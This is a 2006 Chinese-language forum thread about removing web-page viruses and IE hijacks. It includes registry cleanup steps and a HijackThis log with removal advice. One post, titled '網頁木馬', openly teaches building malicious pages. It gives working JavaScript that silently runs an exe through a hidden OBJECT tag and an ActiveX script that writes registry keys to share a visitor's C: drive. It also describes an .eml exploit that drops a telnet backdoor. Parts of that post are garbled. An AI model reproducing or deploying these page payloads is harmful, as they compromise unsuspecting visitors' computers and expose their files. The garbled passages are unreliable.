  1在Windows啟動後,點擊「開始」→「執行」表單項,在「開啟」欄中按鍵輸入regedit,然後按「確定」鍵;

  2展開註冊表到

  HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,在右半部分視窗中找到串值「Start Page」雙按 ,將Start Page的鍵值改為「about:blank」即可;

  3同理,展開註冊表到

  HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main

  在右半部分視窗中找到串值「Start Page」,然後按2中所述方法處理。

  4結束註冊表編輯器,重新啟動電腦,一切OK了!

  特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設定修改好了,重啟以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器裡加了一個自執行程序,它會在系統啟動時將你的IE起始頁設成他們的網站。

  解決辦法:執行註冊表編輯器regedit.exe,然後依次展開

  HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Run

  主鍵,然後將其下的registry.exe子鍵移除,然後移除自執行程序c:/Program Files/registry.exe,最後從IE選項中重新設定起始頁。

  13. IE中滑鼠右鍵失效

  解決辦法:

  1.右鍵表單被修改。開啟註冊表編輯器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,移除相關的廣告條文。

  2.右鍵功能失效。開啟註冊表編輯器,展開到

  HKEY_CURRENT_USER\Software\Policies\Microsoft\

  Internet Explorer\Restrictions,將其DWORD值"NoBrowserContextMenu"的值改為0。

第三節 未知網頁病毒、網頁木馬的進階手動式清理

  我想,文章到這裡應該算是高潮了吧,我們所遇到任何棘手的病毒都是未知的。也正式殺毒軟體管不了的,也沒有專殺工具的干涉,一般的IE修復也是無能為力,那怎麼辦?只有靠自己動手將病毒或木馬請出你的電腦。動手前還是要做一件事。就是驗證一下,你是不是真的染毒了,如果是類QQ病毒那樣的有明顯的徵兆的你當然可以直接進行以下的操作,如果沒呢?就要養成一個謹慎的態度。當發現你的電腦速度這幾天突然速度很慢,你的資料夾或是文件多出幾個,工作裡無緣無故的多出幾個新的工作文件,電腦CPU利用率總是高居不下,一開啟某種檔案類型的文件就出現錯誤,或者是無故的當機、顯示藍色,那麼你該注意了,你的愛機可能已經中毒了。開始你的手動式查殺工作吧。(這時最好是先用昇級後殺毒軟體查一次,如果沒有任何發現,再進去行以下操作)。

  情況一,你是明確知道你的電腦已經中毒了,比如說是QQ上出現自動發出訊息的問題。但你發現你所發的網址並非是以前文章上介紹過的位址,那麼這個站點感染的病毒可能是另外一種植入方式,如載入的文件不同,啟動方式也不同等等。既然已經中毒了,那就不怕什麼了,再次深入虎穴吧。但我們沒必要那樣做,我們某種意義上的深入虎穴,為的是得到這個站點網頁的病毒原碼,如何得到,我想不用我說也大家也清楚。現在很多站點都提供原程式碼檢視的網頁,用它就可以完全實現不用訪問該頁而抽取到原碼(不要太天真哦,用這個辦法那個頁面也會到你IE快取內,但你不必PaPa,這個不會對你夠成任何威脅).如果實在找不到,那你可以到http://www.e3i5.com/bbs/ 找我,我給你臨時做一個檢視頁。(什麼?找不到怎麼辦?那就沒辦法了,你就真的再次深入虎穴,用工作列上的檢視選項去看原碼吧。哈哈~ ^_^!)為什麼要查原碼,主要是看一下,網頁的執行機制是怎麼樣的?又回到我們文章一開始的話題了,為什麼要花些文章在介紹網頁病毒、網頁木馬的常識和執行機理上。學以必用的道理大家比我還清楚。分析出網頁病毒、木馬的機理我們再來進行本機機的清理工具將是一個很好的前提條件。

  情況二,你根本不知道你是不是中毒了,怎麼辦?要從電腦最基本的開始查,工作表。這個一般是查出問題的關鍵之處。一般都要使用第三方軟體來檢視,如 windows最佳化大師的工作管理器,柳葉擦眼等。檢視工作表,那些標幟為系統檔案的工作你可以不看,而那些非系統工作你要注意了。像一些仿系統檔案的工作則是我們重點關心的對象,發現即禁止掉,然後到相應的路徑改名。(由於是非系統工作,終止掉它到下次重新啟動也不會影響電腦的正常執行)然後,檢視該檔案的內容,尤其是檢視「新增時間」如果和你的中毒時間相仿或是差不多遠,那就說明這個文件十之八九就為病毒文件。一般的系統檔案新增時間都是很早哦,大約要比當前時間早一到兩年,甚至三年五年的。按如此辦法我們就可以逐一的找出可疑的文件,然後按以下的方法進行病毒的清理。

  清理工作的開始:

  ⒈準備工作:

  下載工作管理軟體:柳葉擦眼 沒有的請到以下位址下載:

  http://www.e3i5.com/soft/SoftView.Asp?SoftID=361

  這裡我推薦使用 柳葉擦眼 因為它是個綠色軟體,不需要安裝,下載解壓縮後該怎麼用就怎麼用,方便。

  進行手動式殺毒的準備工作,先關閉你能關閉的所有軟體,包括殺毒軟體,防火牆,寬瀕連接等等一切能產生工作的東西.只保留必要的系統工作,這樣會使以後的操作帶來很多方便。

  ⒉檢視系統工作:除了顯示系統檔案外,將所有無關的工作殺掉。

  如:檢視工作表定位文件。intneter.exe c:/windows/system/intneter.exe 這裡的intneter.exe就是仿intnater.exe輸入法工作載入到系統的非法工作文件,我們應馬上結束這個工作,並移除對應的文件,注意一些文件是隱藏的,在搜尋時套用"資料夾選項"開啟對隱藏文件的檢視.

  如果不知道相關的工作,你可以這樣嘗試,

  將工作軟體下載後,斷網,關閉執行的軟體,開啟工作管理軟體,軟體顯示的系統工作你不要理,如果你不知道你以前正常的軟體工作名是什麼的話,將所有非系統的工作全部殺死,(注意除了工作檢視軟體之外的哦,我要是不說一定有人連它一起殺了.)並記下他們的文件路徑,並記錄下來。由於不知道是否是非法文件暫時改名,也記錄下來,以便修改。

  ⒊修改註冊表

  開始 ------ > 執行 ------ > REGEDIT ------ > 編輯 ------ > 搜尋

  搜尋

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunServices]

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunServicesOnce]

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunOnce]

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run]

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunOnce]

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunServices]主鍵下所有的鍵都為空,如果不為空,全部清理為空.使系統啟動不載入任何程序。(一般的來說,驅動程式除了一些顯示驅動會保留在啟動項裡,其他重要的很少了)如果你知道你常用軟體所在RUN以及相關鍵下的值,當然更好,你就可以選項性的進行清理。對以後的整理工作會更方便些。

  修改以下註冊表關聯項目:

  [HKEY_CLASSES_ROOT/ chm.file/ shell/ open/ command "(預設值)" "%windir%/hh.exe" %1 ]

  [HKEY_CLASSES_ROOT/ exefile/ shell/ open/ command "(預設值)" "%1" %* ]

  [HKEY_CLASSES_ROOT/ inifile/ shell/ open/ command "(預設值)" %windir%/NOTEPAD.EXE %1 ]

  [HKEY_CLASSES_ROOT/ regfile/ shell/ open/ command "(預設值)" regedit.exe "%1" ]

  [HKEY_CLASSES_ROOT/ scrfile/ shell/ open/ command "(預設值)" "%1" /S ]

  [HKEY_CLASSES_ROOT/ txtfile/ shell/ open/ command "(預設值)" %windir%/NOTEPAD.EXE %1]

  ⒋清理啟動項組態文件

  1.進入組態管理,除WIN 2K外都為MSCONFIG.

  開始 ------ > 執行 ------ > MSCONFIG

  WIN 9X用戶注意:將啟動組態裡所有帶*.hta,的去掉。HTA的特性就是隱藏掉表單,然後一段時間就彈出網頁.

  進入:system.ini

  修改[BOOT]

  shell=Explorer.exe //注意:後面沒東西了,再有什麼,改成和前面一樣的。

  進入:WIN.INI

  修改[WINDOWS]

  //注意load鍵後面除了=號什麼也沒有。空格都不行。

  LOAD=

  NULLPORT=NONE

  修改:autoexec.bat 內容為空

  WIN 2K 直接進入啟動編輯器。

  修改以上三個文件.

  記得這三個文件裡沒有任何為空的指令指令,有就移除。

  任何值如果為空的話就是什麼都沒有,甚至於空格都不存在。有之,改!

  ⒌清理註冊表LJ訊息

  開始 ------ > 執行 ------ > REGEDIT ------ > 編輯 ------ > 搜尋

  將開機執行的那個站點進行搜尋找到即移除.

  ⒍清理快取 [這點最重要]

  一定要把你的IE緩衝區清理乾淨,以及TEMP資料夾的臨時文件和LJ文件清理乾淨。

  好了,將你記錄的路徑的文件儲存,然後重新啟動電腦。

  ⒎清理校驗

  1.啟動電腦後,再次開啟柳葉擦眼,檢視工作,看除了系統工作是否還有其他工作存在。如果沒有,說明手動式清理完成。如果還發現異常的工作請重複以上步驟。

  2.驗證殺毒完成後,你開始逐一的啟動各類軟體,檢查你所改名的文件是否會影響到軟體執行,如果沒有異常發生,請移除或放入你殺毒軟體的隔離區,(為什麼要選項後者畢竟我們還不清楚這是不是病毒文件,即使是在隔離區的文件系統是不會再次執行的).

  [注意]做這項工作時你一定要想起你在殺工作時儲存的那個工作路徑列表文件,依照上面的文件逐一的進行檢查.

  3.逐一恢復了所有的工作後,重新啟動電腦,再做最後一次檢測。以防萬一。

  4.到此為止,你已經完成了你的全部手動式清理程序,病毒已經被你請出你的電腦了。

  總結:

  不論怎麼說,自己親自清理過一次網頁病毒後,你會覺得網頁病毒其實也並非那樣可怕,最難的是挑戰自我的勇氣。我個人並不推薦電腦出了問題就是格式化硬碟、重裝,這並非是一個解決問題的途徑。我們建議大家首先先簡單的認識惡意網頁的程式碼機理為的就是從根本上來解決問題。但,我們更強調的是動手能力。當然我的意思也並非完全拋棄殺毒和防毒軟體,但,畢竟是個工具。俗話講得好:事在人為。

  [新問題]

  最近在寫一個特殊效果頁的時候,發現一個新問題,頁面在執行了幾個特殊函數後,整個頁面被鎖死,以下所有的JS全部失效,開啟工作檢視,發現有一個svchost.exe一直在監視這個頁面工作,而在WINDOWS的標準工作管理中看不到,只有借助第三方軟體才能終止此工作,即使終止了網頁工作,這個svchost.exe的監視工作還在。與好友LuoLuo商量了一段時間後,猜測可能是由於頁面中的某部分程式碼引起了緩衝區溢位,導致IE崩潰,而不能執行頁面指令。多次測試只後我們還是找不到原因,到底是哪部分函數引起了這個問題我們還在研究中,出現的問題就是非常非常的隱蔽,如果在頁面鎖死後可以注入一些惡意程式碼或是木馬那不是沒救了?IE啊…用MOZILLA算了,哈哈~

  後 記

  全文到這裡基本上結束了。通篇文章涉及到網頁病毒程式碼分析,中毒機理分析,預防手段,以及一般的查殺、手動式查殺 四大部分的介紹。我盡量做到詳細的將問題以最簡單易懂的方式說明。歸結到一點就是,希望大家能從網頁病毒的本質出發來面對它,解決它。仔細想想現在含各式病毒站點越來越多,而他們利用的也不僅僅是程式碼的威力以及系統或是瀏覽器上漏洞,也上在利用大家在瀏覽網頁的安全意識不健全的基礎上。另外,我還想說明的一點就是:不要完全依靠殺毒軟體,現在國內的一些殺毒軟體做的並完善,殺毒不徹底,很容易殘留一些病毒遺體到你電腦內,當你一不小心執行了它,病毒又死灰復燃了;還有就是一部分殺毒軟體雖然能及時的預警,但在殺毒上卻稍遜一籌.殺掉了快取內的病毒原體,卻留下了病毒自動產生的新文件。這也似乎成了國內軟體的一個通病,功能有,但不強大。面對著如此格局,除了自己伸手幫自己,還能有什麼辦法?相信自己,遇到問題自己動手解決.
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2006-04-06, 10:07 PM   #3 (permalink)
長老會員
榮譽勳章
UID - 5880
在線等級: 級別:10 | 在線時長:156小時 | 升級還需:9小時級別:10 | 在線時長:156小時 | 升級還需:9小時級別:10 | 在線時長:156小時 | 升級還需:9小時級別:10 | 在線時長:156小時 | 升級還需:9小時級別:10 | 在線時長:156小時 | 升級還需:9小時
註冊日期: 2002-12-08
文章: 296
精華: 0
現金: 172 金幣
資產: 1255044 金幣
預設

好多資料,先存檔再來消化一下.之前中了 MSSVCC 的毒,弄了好久才清除.
b16465 目前離線  
送花文章: 0, 收花文章: 4 篇, 收花: 4 次
舊 2006-04-22, 07:13 PM   #4 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網頁木馬
大家對木馬都不陌生了,它可能要算是電腦病毒史上最厲害的了,相信會使木馬的人千千萬萬,但是有很多人苦於怎麼把木馬發給對方,現在隨著電腦的普及,在網路上我相信很少有人會再輕易的接收對方的文件了,所以網頁木馬誕生了。
1.它應該算是html帶動同路徑下的一個exe的文件的主頁了,也就是當瀏覽器瀏覽這個頁面的時候,一個exe的文件就在後台自動下載並執行了,可以做一個test.html的文件在桌面,內容如下:
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>網頁載入中,請稍後....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下隨便找個exe的文件,名字一定要改為tset.exe,好了,這時候雙按我們剛才產生的html文件,當看到「網頁載入中,請稍後....」的時候,我們的那個同路徑下的exe文件也被無條件執行了,這種頁面的優點就是編譯修改簡單,但是!當你申請下了一個個人主頁空間的時候,把這兩個文件上傳上去的時候,當你試圖通過瀏覽器瀏覽你的傑作的時候,ie的安全警告跳了出來,我想沒有幾個人願意乖乖的冒著風險去點「是」,好了,儘管這個網頁木馬在本機是多麼的完美,但是放到了網上就通不過ie的安全原則了,這個小馬失敗了。
2.是通過ie自身的漏洞寫入註冊表,相信很多人經常在瀏覽一些主頁的時候,註冊表被改的亂七八糟、ie標題被改、首頁被改、註冊表編輯器被禁用等等,這些都是自動修改了你的註冊表的網頁的傑作,所以我門也可以做個頁面讓瀏覽者的硬碟完全共享,也是做個html的文件,內容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}

init();
</script>
當對方的瀏覽過這個頁面的時候,他的c:就被共享了,共享後的進入方法嘛..哈哈不用說了吧,但是他雖然被共巷了,但是你還不知道誰正在看你的這個頁面,他的ip又是多少你都不知道,沒有關係,有個很簡單的方法,去163申請一個域名的轉換,如:http://www.jdxh.com連接目標位址裡...褪槍蠶砹{恿恕?/a>
這種網頁木馬的特點是比較安全,不宜被對方發現,但是使用麻煩需要牽扯到很多的東西。

3.也是現在最好用的一種了吧,個人認為。它是將一個小巧的exe文件作成一個.eml的文件,再用ie的漏洞讓一個html的頁面執行這個.eml的文件,你的那個小巧的exe文件就被執行了,由於程式碼過長又因每個exe文件轉換後的程式碼不同所以不可能一一寫出,下面指出一個位址http://www.jdxh.com實際上就是一個轉...憧梢醞&uuml;齮elnet x.x.x.x 3385來完全控制對方(這個5k的小後門是winshell5.0黑白網路有下,同時這個winshell5.0還有一個很出色的功能,就是能下載一個你事先設定好的指定路徑下的一個文件,並執行他,我放置的是網路深偷,如果你的殺毒軟體夠厲害的話,神偷是可以被查出來的,這裡只是實驗,實際中可以指定很多查不到的小馬,這裡不闡述),有興趣的朋友可以來試試。
這種網頁木馬的特點是,對方挨種率較高,除了製作麻煩一點外,沒有什麼缺點啦
好了所有的漏洞都是建立在系統漏洞的前提下,多昇級多打修正檔沒有壞處
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2006-06-04, 05:23 PM   #5 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

IE被劫持。附HijackThis記錄


Q:

在網上搜索電影資源不慎IE被劫持,主頁強制指向http://www*shaofu*net
經查c:\windows\system32目錄下
shdocvw.dll及xpsp3res.dll比較可疑,附上附HijackThis記錄,請大家看看,不勝感謝。
Logfile of HijackThis v1.99.1
Scan saved at 17:00:08, on 2006-6-4
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\WINDOWS\stsystra.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
D:\Program Files\Herosoft\Hero 9\SysExplr.EXE
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Common Files\Ahead\lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Eset\nod32.exe
C:\Program Files\Eset\nod32.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\system32\DllHost.exe
C:\DOCUME~1\CMC\LOCALS~1\Temp\Rar$EX11.9907\HijackThis.exe

R3 - URLSearchHook: (no name) - {982CB676-38F0-4D9A-BB72-D9371ABE876E} - (no file)
O2 - BHO: ThunderIEHelper Class - {0005A87D-D626-4B3A-84F9-1D9571695F55} - C:\WINDOWS\system32\xunleibho_v8.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: ThunderBHO - {889D2FEB-5411-4565-8998-1DD2C5261283} - C:\Program Files\Thunder Network\Thunder\ComDlls\XunLeiBHO_001.dll
O2 - BHO: Internet_Explorer_Service - {9E1E1371-9D8F-4421-81B9-F8D2E1773A59} - C:\WINDOWS\system32\HelperService.dll
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRA~1\FlashGet\jccatch.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: 系統標準按鈕(&E) - {6B2455FD-3669-4555-8DF8-69FD5BC846F8} - C:\WINDOWS\system32\SystemToolbar.dll
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [IMSCMig] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload
O4 - HKLM\..\Run: [KAVPersonal50] "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\kav.exe" /minimize
O4 - HKLM\..\Run: [SigmatelSysTrayApp] stsystra.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SysExplr] d:\Program Files\Herosoft\Hero 9\SysExplr.EXE
O4 - HKLM\..\Run: [Thunder] "D:\Program Files\Thunder Network\Thunder\ThunderShell.exe" /s
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: &使用迅雷下載 - C:\Program Files\Thunder Network\Thunder\Program\GetUrl.htm
O8 - Extra context menu item: &使用迅雷下載全部鏈接 - C:\Program Files\Thunder Network\Thunder\Program\GetAllUrl.htm
O8 - Extra context menu item: >>彩信發送<< - res://C:\Program Files\MMSAssist\Mmsass~1.dll/mms.htm
O8 - Extra context menu item: Google 搜索(&G) - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: 上傳到QQ網路硬碟 - C:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 使用網際快車下載 - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用網際快車下載全部鏈接 - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: 使用超級解霸播放 - d:\Program Files\Herosoft\Hero 9\MPURLGET.HTM
O8 - Extra context menu item: 反向鏈接 - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: 匯出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: 新增到QQ自定義面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 新增到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信發送該圖片 - C:\Program Files\Tencent\QQ\SendMMS.htm
O8 - Extra context menu item: 類似網頁 - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: 快取記憶體的網頁快照 - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: 翻譯英文字詞(&T) - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O9 - Extra button: 網址大全 - {1FBA04EE-3024-11D2-8F1F-0000F87ABD18} - http://www.coc.cc (file missing)
O9 - Extra button: 豪傑超級解霸9 - {367E0A21-8601-4986-9C9A-153BF5ACA118} - d:\Program Files\Herosoft\Hero 9\STHSDVD.EXE
O9 - Extra 'Tools' menuitem: 豪傑超級解霸9 - {367E0A21-8601-4986-9C9A-153BF5ACA118} - d:\Program Files\Herosoft\Hero 9\STHSDVD.EXE
O9 - Extra button: 訊息檢索 - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - C:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra 'Tools' menuitem: 騰訊QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - C:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe
O9 - Extra button: (no name) - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll (file missing)
O9 - Extra 'Tools' menuitem: QQ炫彩工具條設置 - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {0B3D00E3-2B73-4402-8C65-5AC792E4774A} (Seagate SeaTools Chinese Online) - http://www.seagate.com/support/disc/...npseatools.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsu...?1133456312109
O16 - DPF: {8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} (AxSubmitControl Class) - https://mybank.icbc.com.cn/icbc/perb...feControls.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{3464B4DF-190B-4DD9-BE32-8660593D6380}: NameServer = 211.98.2.4 202.102.192.68
O21 - SSODL: Vision - {6671A431-5C3D-463d-A7CF-5587F9B7E191} - (no file)
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: kavsvc - Kaspersky Lab - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\kavsvc.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Unknown owner - %ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini (file missing)




A:



關閉IE瀏覽器和資源流覽器視窗後,勾選並按FIX CHECKED修復:
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Internet_Explorer_Service - {9E1E1371-9D8F-4421-81B9-F8D2E1773A59} - C:\WINDOWS\system32\HelperService.dll
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
修復完畢後重啟電腦,再刪除上述文件。


使用HijackThis,按 Do a system scan only, 在以下專案的方格前打上勾,關閉你的IE,按 Fix checked 修復
R3 - URLSearchHook: (no name) - {982CB676-38F0-4D9A-BB72-D9371ABE876E} - (no file)
O2 - BHO: Internet_Explorer_Service - {9E1E1371-9D8F-4421-81B9-F8D2E1773A59} - C:\WINDOWS\system32\HelperService.dll
O3 - Toolbar: 系統標準按鈕(&E) - {6B2455FD-3669-4555-8DF8-69FD5BC846F8} - C:\WINDOWS\system32\SystemToolbar.dll
O21 - SSODL: Vision - {6671A431-5C3D-463d-A7CF-5587F9B7E191} - (no file)
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2006-06-12, 02:59 PM   #6 (permalink)
長老會員
 
yu jun 的頭像
榮譽勳章
UID - 3708
在線等級: 級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時級別:35 | 在線時長:1406小時 | 升級還需:34小時
註冊日期: 2002-12-07
住址: 很想要有個家
文章: 4056
現金: 17880 金幣
資產: 42162 金幣
預設

珍貴資料..下載收藏防備..
感謝 版大 的熱心分享!
yu jun 目前離線  
送花文章: 1810, 收花文章: 365 篇, 收花: 1966 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 07:52 PM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1